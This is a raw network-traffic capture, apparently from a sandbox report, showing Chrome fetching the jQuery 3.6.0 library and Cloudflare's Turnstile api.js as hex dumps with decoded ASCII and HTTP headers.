                                          2025-01-08 15:13:27 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549724151.101.130.1374433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:27 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                          Host: code.jquery.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:27 UTC613INHTTP/1.1 200 OK
                                          Connection: close
                                          Content-Length: 89501
                                          Server: nginx
                                          Content-Type: application/javascript; charset=utf-8
                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                          ETag: "28feccc0-15d9d"
                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          Via: 1.1 varnish, 1.1 varnish
                                          Accept-Ranges: bytes
                                          Date: Wed, 08 Jan 2025 15:13:27 GMT
                                          Age: 1833733
                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740073-EWR
                                          X-Cache: HIT, HIT
                                          X-Cache-Hits: 2774, 1
                                          X-Timer: S1736349207.464530,VS0,VE1
                                          Vary: Accept-Encoding
                                          2025-01-08 15:13:27 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                          2025-01-08 15:13:27 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                          2025-01-08 15:13:27 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                          2025-01-08 15:13:27 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                          2025-01-08 15:13:27 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                          2025-01-08 15:13:27 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                          2025-01-08 15:13:27 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                          2025-01-08 15:13:27 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                          2025-01-08 15:13:27 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                          2025-01-08 15:13:27 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549725104.18.95.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:28 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:28 UTC471INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:28 GMT
                                          Content-Type: application/javascript; charset=UTF-8
                                          Content-Length: 47521
                                          Connection: close
                                          accept-ranges: bytes
                                          last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                          access-control-allow-origin: *
                                          cross-origin-resource-policy: cross-origin
                                          Server: cloudflare
                                          CF-RAY: 8fed21b6ed76de98-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:28 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                          2025-01-08 15:13:28 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                          Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                          2025-01-08 15:13:28 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                          2025-01-08 15:13:28 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                          2025-01-08 15:13:28 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                          2025-01-08 15:13:28 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                          Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
